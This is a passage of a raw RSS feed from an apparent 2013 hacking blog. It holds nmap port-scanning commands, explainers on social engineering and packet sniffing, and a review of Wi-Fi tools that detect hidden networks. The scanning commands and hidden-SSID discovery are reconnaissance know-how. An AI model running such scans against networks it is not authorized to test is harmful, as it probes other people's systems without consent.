&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRuD-bstBKlj7dc8l6AtYy_X2fwFWxmFuuMZVMqCDG4P9KsCBbArRghi3v85B9W9LPJ3hYdZqF4R64Tagbm-3_y4C4jxPmDCuCNH_23JdYzGAs6X3LejfR-lQn7dGWIHNIv6KMBnPmZ0E/s1600/How+do+I+detect+remote+operating+system+3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRuD-bstBKlj7dc8l6AtYy_X2fwFWxmFuuMZVMqCDG4P9KsCBbArRghi3v85B9W9LPJ3hYdZqF4R64Tagbm-3_y4C4jxPmDCuCNH_23JdYzGAs6X3LejfR-lQn7dGWIHNIv6KMBnPmZ0E/s1600/How+do+I+detect+remote+operating+system+3.JPG" height="292" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGaeLG3DknK9rQUC7MGJuXl-GFS5V-A8H1GLjp_DDIW91IlPEWoyuY9KTaQw22jYc2uzdUzt8VnPyO-giQqcwd2SeRDVzGEAxXlabQCflttCifppN6PGjJhXj62-487KUxMpqLS2P_nwg/s1600/How+do+I+detect+remote+operating+system.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGaeLG3DknK9rQUC7MGJuXl-GFS5V-A8H1GLjp_DDIW91IlPEWoyuY9KTaQw22jYc2uzdUzt8VnPyO-giQqcwd2SeRDVzGEAxXlabQCflttCifppN6PGjJhXj62-487KUxMpqLS2P_nwg/s1600/How+do+I+detect+remote+operating+system.JPG" height="216" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;#10:&amp;nbsp;How do I scan specific ports?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
#15: How do I scan specific ports?&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
map -p [port] hostName&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
## Scan port 80&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
nmap -p 80 192.168.1.1&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
## Scan TCP port 80&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
nmap -p T:80 192.168.1.1&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
## Scan UDP port 53&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
nmap -p U:53 192.168.1.1&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
## Scan two ports ##&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
nmap -p 80,443 192.168.1.1&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
## Scan port ranges ##&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
nmap -p 80-200 192.168.1.1&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivGBYbSaJSc_PMQHWEquO19BOOev9EGvWqAaXdClqheqfG_cgTubO5qCypQfwu4w8A5ZpVhUmNQ8vhSPy4wDaKmQuZK_PqJBaLzoEY9Y0AQioFv0wPH-CKxUpeGTkaaLYgfzX1QQxDhsU/s1600/How+do+I+scan+specific+ports+2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivGBYbSaJSc_PMQHWEquO19BOOev9EGvWqAaXdClqheqfG_cgTubO5qCypQfwu4w8A5ZpVhUmNQ8vhSPy4wDaKmQuZK_PqJBaLzoEY9Y0AQioFv0wPH-CKxUpeGTkaaLYgfzX1QQxDhsU/s1600/How+do+I+scan+specific+ports+2.JPG" height="155" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuH0AC4U8JOlucSeFVT7OVSrYtAfd1EWTCfKSUzjJqiVgFdEZMT9YZh4eFWBx0LM-dH2zsBkbJyg3LNqF7-9GruC1GA1zLfuVNxOXb5x-CrQDIVws1XIXrW5jF3IzcBjPLR_k_vXiycGE/s1600/How+do+I+scan+specific+ports+3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuH0AC4U8JOlucSeFVT7OVSrYtAfd1EWTCfKSUzjJqiVgFdEZMT9YZh4eFWBx0LM-dH2zsBkbJyg3LNqF7-9GruC1GA1zLfuVNxOXb5x-CrQDIVws1XIXrW5jF3IzcBjPLR_k_vXiycGE/s1600/How+do+I+scan+specific+ports+3.JPG" height="180" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Thanks To visit Hack Hippo i Hope you like it, if you have any doubt feel free comments.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;div&gt;
© HaCkHiPp0-TeaM.&lt;/div&gt;
&lt;div&gt;
R0oTx:Sahil_Rai,&amp;nbsp;Manish Pathak (1337C001),&amp;nbsp;p7771 (p@nku k@p0or)&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/10/nmap-top-10-commands.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg98APXdALy14vET3wp6exW773zPg39t5RaW7VnkdaSFybReWu9vlqnAle3evrYnzv4uCD4oAIQN8bORkbkPx52dzXEJG0YUKc5C4tDSRiRhWjmRwVvvH7eYh-yRqPzxhm09rWh-0hLvxw/s72-c/Nmap-Single-host-scann-ip.JPG" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-3095650907764261086</guid><pubDate>Mon, 28 Oct 2013 06:27:00 +0000</pubDate><atom:updated>2013-10-27T23:30:45.212-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Social Engineering</category><title>What is social engineering?</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;b&gt;What is social engineering?&lt;/b&gt;&lt;/h2&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip49BWN63zpRrbEd7OAvoNZoUSmH_1HUMeIMvSr6s6PQnbmTDeSsI4jkR5QmpA-HqPFc_PGZQ-Ykh4a2SVseQ0LbjePIEE4kWtOQTvkSX67nVMWR87aWouCHljWQbmb6MPmVfvk8kp1X4/s1600/What-is-social-engineering.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip49BWN63zpRrbEd7OAvoNZoUSmH_1HUMeIMvSr6s6PQnbmTDeSsI4jkR5QmpA-HqPFc_PGZQ-Ykh4a2SVseQ0LbjePIEE4kWtOQTvkSX67nVMWR87aWouCHljWQbmb6MPmVfvk8kp1X4/s1600/What-is-social-engineering.jpg" height="208" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
Social engineering is the use of deception and manipulation to obtain confidential information. It is a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking people into breaking normal security procedures. Social engineers rely on the fact that people are not aware of the value of the information they possess and are careless about protecting it.&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
In anti virus computer security software, social engineering is generally a hacker's clever manipulation of the natural human tendency to trust. The hacker's goal is to obtain information that will gain him/her unauthorized access to a system and the information that resides on that system. Typical examples of social engineering are phishing e-mails or pharming sites.&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Examples of social enginering&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
One example of malware using social engineering tricks were the Japan Earthquake scams that have been discovered in March 2011. In one of these cases, scammers were spreading malicious links to “dramatic” videos of the disaster. So, when you searched for news on the earthquake or tsunami you ended up clicking on a link that actually downloaded malware onto your PC or took you to a phishing site that asked for personal information. In addition to sending spam emails and poisoning search results with dangerous links, cybercrooks are also posting donation requests and links to malware on social networking sites. Therefore, you could have your money and credit card, as well as your identity information, stolen.&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
Another example is the Tax Related Identity Theft Scams. Cases of stolen tax returns have surged over the past five years, leaving many identity theft victims struggling to recover their lost refunds. Approximately 155 million tax forms are filed annually. This provides identity thieves with an opportunity to steal from Americans who are just trying to pay their taxes correctly. A recent Scripps Howard News Service investigation analysed more than 1.4 million ID theft records from the U.S. Federal Trade Commission from 2005 through early 2010. &amp;nbsp;In it they found that fraud complaints about stolen tax return-related identity theft jumped from 11,010 complaints in 2005 to 33,774 in 2009. That’s nearly 300%.&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Attacks on the rise&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
Despite increases in the number and capability of botnets for distributed denial of service (DDoS) attacks, social engineering remains one of the largest cyber security threats to IT infrastructure. Throughout 2010, experts witnessed various attacks that used the two most popular social networks - Facebook and Twitter - as launching pads. In 2011, not only will hackers continue to use these networks, but it is predicted that they will also be used more for distributed attacks.&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/10/what-is-social-social-engineering-is.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip49BWN63zpRrbEd7OAvoNZoUSmH_1HUMeIMvSr6s6PQnbmTDeSsI4jkR5QmpA-HqPFc_PGZQ-Ykh4a2SVseQ0LbjePIEE4kWtOQTvkSX67nVMWR87aWouCHljWQbmb6MPmVfvk8kp1X4/s72-c/What-is-social-engineering.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-6467072497906358577</guid><pubDate>Mon, 28 Oct 2013 05:59:00 +0000</pubDate><atom:updated>2013-10-27T23:10:46.508-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Sniffers</category><title>Sniffing</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;Network Sniffing&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK1goVPeCUZ8_KtngB96yFaqzdEfldI3-9dJe6CPzIN2IZXmgZbRsfpGv9tfR-LO3Mcbr8TU28p3ePZZhk0s2MHmzH7O_y_X2lqe6iYCn9XEDTqYlVD7EIg8dzUDBATVK2ip4yltac2nE/s1600/sinffing.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK1goVPeCUZ8_KtngB96yFaqzdEfldI3-9dJe6CPzIN2IZXmgZbRsfpGv9tfR-LO3Mcbr8TU28p3ePZZhk0s2MHmzH7O_y_X2lqe6iYCn9XEDTqYlVD7EIg8dzUDBATVK2ip4yltac2nE/s1600/sinffing.jpg" height="198" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/span&gt;&lt;/h2&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;A packet sniffer is a utility that has been used since the original release of Ethernet.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Packet sniffing allows individuals to capture data as it is transmitted over a network. Packet sniffer programs are commonly used by network professionals to help diagnose network issues and are also used by malicious users to capture unencrypted data like passwords and usernames in network traffic. Once this information is captured, the user can then gain access to the system or network.&lt;/li&gt;
&lt;li&gt;If you wish to keep information confidential or are concerned about packet sniffing, it is advised that you work on encrypted protocols and encrypt all sensitive data, such as e-mails, being sent over the Internet or network. A great encryption program is PGP, users who are using Telnet should consider using SSH instead.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/10/sniffing.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK1goVPeCUZ8_KtngB96yFaqzdEfldI3-9dJe6CPzIN2IZXmgZbRsfpGv9tfR-LO3Mcbr8TU28p3ePZZhk0s2MHmzH7O_y_X2lqe6iYCn9XEDTqYlVD7EIg8dzUDBATVK2ip4yltac2nE/s72-c/sinffing.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-4894153080398502574</guid><pubDate>Sun, 27 Oct 2013 06:12:00 +0000</pubDate><atom:updated>2013-10-27T10:11:24.210-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">CEH v8</category><category domain="http://www.blogger.com/atom/ns#">Denial of Service</category><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Educational</category><category domain="http://www.blogger.com/atom/ns#">Enumeration</category><category domain="http://www.blogger.com/atom/ns#">Ethical Hacking</category><category domain="http://www.blogger.com/atom/ns#">Footprinting</category><category domain="http://www.blogger.com/atom/ns#">Hackers</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Hacking Web Applications</category><category domain="http://www.blogger.com/atom/ns#">Hacking Webservers</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><category domain="http://www.blogger.com/atom/ns#">Scanning</category><category domain="http://www.blogger.com/atom/ns#">Session Hijacking</category><category domain="http://www.blogger.com/atom/ns#">Sniffers</category><category domain="http://www.blogger.com/atom/ns#">Social Engineering</category><category domain="http://www.blogger.com/atom/ns#">System Hacking</category><category domain="http://www.blogger.com/atom/ns#">Trojans and Backdoors</category><category domain="http://www.blogger.com/atom/ns#">Viruses and Worms</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><title>Top 8 WiFi Scanners For Ms Windows</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2&gt;
Top 8 WiFi Scanners For Ms Windows&lt;span style="color: #111111; font-family: Verdana, Geneva, Tahoma, sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7zvYPRvCZioef0LDCDFLheMQcKKLog3sWEX5qg7OqqUCkPK4_GJ5vSM4fUyAq3GChSqlcw94mGH9qBOkps57RMwHro5IZw6WqwgIJ91165oPQQrdgYuMKpPiTTpVRjGX2wV-CmDrEtGg/s1600/Top-8-WiFi-Scanners-For-Ms-Windows.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7zvYPRvCZioef0LDCDFLheMQcKKLog3sWEX5qg7OqqUCkPK4_GJ5vSM4fUyAq3GChSqlcw94mGH9qBOkps57RMwHro5IZw6WqwgIJ91165oPQQrdgYuMKpPiTTpVRjGX2wV-CmDrEtGg/s1600/Top-8-WiFi-Scanners-For-Ms-Windows.jpg" height="200" width="166" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/span&gt;&lt;/h2&gt;
Most of the wireless routers today comes with some security feature such as security encryption (WEP/WPA), MAC address filtering, lowering transmission power, disabling DHCP &amp;amp; use static IP, and hiding of SSID to help keep your wireless network safe from intruders. Each wireless security mechanism helps to increase the difficulty of unauthorized users from hacking in to your wireless networks but surely does not prevent the determined ones. In this article we will be focusing on one of the option “Broadcast SSID” found in most wireless routers.&lt;br /&gt;
&lt;br /&gt;
Basically when the broadcast SSID option is enabled, all wireless capable devices can see your router listed together with a bunch of other wireless networks. This option provides a convenience for you to easily connect to it by clicking on your SSID and entering the security key. However, this also allows the nearby hackers to find your network and also see the signal strength with the security type being used directly from Windows without even the need to run a network scanning tool. Non broadcasting wireless networks are not totally invisible as well because they can be detected by any of the 8 tools mentioned below.&lt;br /&gt;
&lt;br /&gt;
1. inSSIDer&lt;br /&gt;
&lt;br /&gt;
inSSIDer is the most popular free and open source Wi-Fi scanning tool available today. It is easy to use and understand without all the confusing configuration. After installation, running inSSIDer will automatically select your wireless adapter to start scanning for available access points. Then the results will be shown in a sortable table in the program displaying information such as SSID, channel, security, RSSI, MAC Address, maximum rate, vendor and network type.&lt;br /&gt;
&lt;div style="border: 0px; color: #111111; font-family: Verdana, Geneva, Tahoma, sans-serif; font-size: 14px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;img alt="inSSIDer" class="aligncenter" data-lazy-loaded="true" src="http://static.raymond.cc/images/inssider-ssid.png" style="display: block; height: auto; margin: 5px auto 0px; max-width: 100%;" /&gt;&lt;/div&gt;
The hidden wireless network is shown in the first line with an empty SSID but the rest of the information about the network is displayed. inSSIDer works on Windows XP/Vista/7 (32-bit &amp;amp; 64-bit) and also on Android and Mac.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.raymond.cc/blog/download/?did=1017"&gt;Download inSSIDer&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
2. WirelessNetView&lt;br /&gt;
&lt;br /&gt;
Another excellent small and portable utility by Nir Sofer called WirelessNetView allows you to view the available wireless networks around you. By placing the OUI database at the same folder as WirelessNetView, it can even show the brand of the wireless router based on the MAC address. It is possible to generate a HTML report file from the right click context menu and it also has command line support to save the list of wireless networks into an external TXT, CSV, HTML or XML file.&lt;br /&gt;
&lt;div style="border: 0px; color: #111111; font-family: Verdana, Geneva, Tahoma, sans-serif; font-size: 14px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;img alt="WirelessNetView" class="aligncenter" data-lazy-loaded="true" src="http://static.raymond.cc/images/wirelessnetview.png" style="display: block; height: auto; margin: 5px auto 0px; max-width: 100%;" /&gt;&lt;/div&gt;
The hidden wireless network is shown without a SSID. A unique feature found in WirelessNetView is the ability to restart Windows Wireless Service from the Options toolbar or alternatively from the hotkey Ctrl+R. WirelessNetView works from Windows XP to Windows 7.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.raymond.cc/blog/download/?did=1018"&gt;Download WirelessNetView&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
3. Winhotspot&lt;br /&gt;
&lt;br /&gt;
Winhotspot is actually a stand alone application that allows you to easily create a hotspot to share your Internet connection using your wireless adapter. However it also comes with a scanner which can be accessed from the WiFi Stats tab and clicking the Refresh button shows all the available wireless networks including the hidden ones.&lt;br /&gt;
&lt;div style="border: 0px; color: #111111; font-family: Verdana, Geneva, Tahoma, sans-serif; font-size: 14px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;img alt="Winhotspot" class="aligncenter" data-lazy-loaded="true" src="http://static.raymond.cc/images/winhotspot.png" style="display: block; height: auto; margin: 5px auto 0px; max-width: 100%;" /&gt;&lt;/div&gt;
The wardriving feature is very basic that only shows the important information such as SSID, Auth, BSSID, Signal, Radio and Channel. This utility is only 154KB in size and works only in Windows 7 and 8. The file is hosted in CNET’s server and you should click on the Direct Download link instead of the big Download Now button to avoid downloading the unnecessary 600KB CNET installer.&lt;br /&gt;
&lt;div style="border: 0px; color: #111111; font-family: Verdana, Geneva, Tahoma, sans-serif; font-size: 14px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;strong style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;a href="http://www.raymond.cc/blog/download/?did=1019" rel="nofollow" style="border: 0px; color: #2a9ed4; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;"&gt;Download Winhotspot&lt;/a&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;hr style="background-color: #cccccc; border: 0px; font-family: Verdana, Geneva, Tahoma, sans-serif; font-size: 11px; height: 1px; line-height: 17px; margin-bottom: 1.625em;" /&gt;
4. Homedale&lt;br /&gt;
&lt;br /&gt;
Homedal (&lt;a href="http://www.raymond.cc/blog/homedale-wlan-monitor-watch-log-wifi-signal/"&gt;read our full review&lt;/a&gt;) is another portable and free wireless monitoring tool that is capable of showing hidden wireless networks. The program is divided into four different tabs showing an overview of your wireless adapter, access points, signal graph and options. At the Access Points tab you can see all the detected networks with the signal strength levels being automatically updated every few seconds.&lt;br /&gt;
&lt;div style="border: 0px; color: #111111; font-family: Verdana, Geneva, Tahoma, sans-serif; font-size: 14px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;img alt="Homedale" class="aligncenter" data-lazy-loaded="true" src="http://static.raymond.cc/images/homedale.png" style="display: block; height: auto; margin: 5px auto 0px; max-width: 100%;" /&gt;&lt;/div&gt;
&lt;br /&gt;
An interesting feature found in Homedale is the ability to connect to the access point by right clicking on the AP and select Connect. Unfortunately the connect command does nothing to the hidden ones without the SSID.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.raymond.cc/blog/download/?did=1020"&gt;Download Homedale&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
5. NetSurveyor&lt;br /&gt;
&lt;br /&gt;
NetSurveyor by Nuts About Nets seems to be a more professional tool as it comes with logging to record and playback the data. Other than that, a PDF report can also be automatically generated from the File menu that shows the discovered networks, beacon qualities, usage of channels and timecourse/heatmap/spectrogram of channels.&lt;br /&gt;
&lt;div style="border: 0px; color: #111111; font-family: Verdana, Geneva, Tahoma, sans-serif; font-size: 14px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;img alt="NetSurveyor" class="aligncenter" data-lazy-loaded="true" src="http://static.raymond.cc/images/netsurveyor_001.png" style="display: block; height: auto; margin: 5px auto 0px; max-width: 100%;" /&gt;&lt;/div&gt;
Hidden wireless networks are shown as UNKNOWN_SSID_BSSID in the program. The channel usage bar graph instantly tells you the overlapping channels with the colored bars. Even if your computer does not have a wireless adapter, NetSurveyor can be ran as DEMO mode to get a feel on how it works. NetSurveyor works from XP SP3 with Microsoft .NET Framework version 3.5 or later.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.raymond.cc/blog/download/?did=1021"&gt;Download NetSurveyor&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
6. Xirrus Wi-Fi Inspector&lt;br /&gt;
&lt;br /&gt;
Xirrus Wi-Fi Inspector is biggest in file size at 21MB if compared to the rest of the scanners mentioned in this article. The program has a modern ribbon type of user interface which seems a bit unnecessary because it only has 1 Home tab. The program categorizes into four different parts which is the radar, connection information, found networks and signal history. The radar simply displays the access points closest to you.&lt;br /&gt;
&lt;div style="border: 0px; color: #111111; font-family: Verdana, Geneva, Tahoma, sans-serif; font-size: 14px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;img alt="Xirrus Wi-Fi Inspector" class="aligncenter" data-lazy-loaded="true" src="http://static.raymond.cc/images/xirrus-wifi-inspector.png" style="display: block; height: auto; margin: 5px auto 0px; max-width: 100%;" /&gt;&lt;/div&gt;
A gadget version of the Inspector can also be downloaded from the official website. It is free and works on Windows XP SP2 or later, Vista, or 7.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.raymond.cc/blog/download/?did=1023"&gt;Download Xirrus Wi-Fi Inspector&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
7. Vistumbler&lt;br /&gt;
&lt;br /&gt;
Vistumbler is a free wireless network scanner coded in Autoit made for Vista to replace the outdated Netstumbler. Vistumbler has been around since 2007 and an updated version has been recently released after without updates for 2 years. The method used by Vistumbler to scan the access point is the same as method #8 below except the results are shown in an easy to read table.&lt;br /&gt;
&lt;div style="border: 0px; color: #111111; font-family: Verdana, Geneva, Tahoma, sans-serif; font-size: 14px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;img alt="Vistumbler" class="aligncenter" data-lazy-loaded="true" src="http://static.raymond.cc/images/vistumbler.png" style="display: block; height: auto; margin: 5px auto 0px; max-width: 100%;" /&gt;&lt;/div&gt;
Running Vistumbler will report that an update is available even though we’ve just downloaded the latest version. Clicking on the Yes button will prompt an error about a variable used without being declared and clicking OK will close the program. What you need to do is simply click No when it ask you if you like to update vistumbler.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.raymond.cc/blog/download/?did=1022"&gt;Download Vistumbler&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;
8. netsh&lt;br /&gt;
If you are unable to install and run any of the 7 tools above, netsh would be your best alternative. netsh is a command shell tool by Microsoft found in Windows operating system. Simply launch command prompt and type the following command line to get a list of wireless networks. It is advisable to disconnect from any access points before running this command to get a more accurate result.&lt;br /&gt;
&lt;br /&gt;
netsh wlan show networks mode=bssid&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;div style="border: 0px; color: #111111; font-family: Verdana, Geneva, Tahoma, sans-serif; font-size: 14px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;img alt="netsh ssid" class="aligncenter" data-lazy-loaded="true" src="http://static.raymond.cc/images/netsh-wlan.png" style="display: block; height: auto; margin: 5px auto 0px; max-width: 100%;" /&gt;&lt;/div&gt;
The netsh command is useful because it doesn’t require installation of third party programs but it does not come with a fancy graphical user interface or nice looking graphs. Surprisingly the netsh tool is able to show quite a wealth of information if compared to the third party tools mentioned above. Do take note that if both wired and wireless are connected, you will need to disable the wired connection first or else you’ll get the message “There are 0 networks currently visible”.&lt;br /&gt;
&lt;br /&gt;
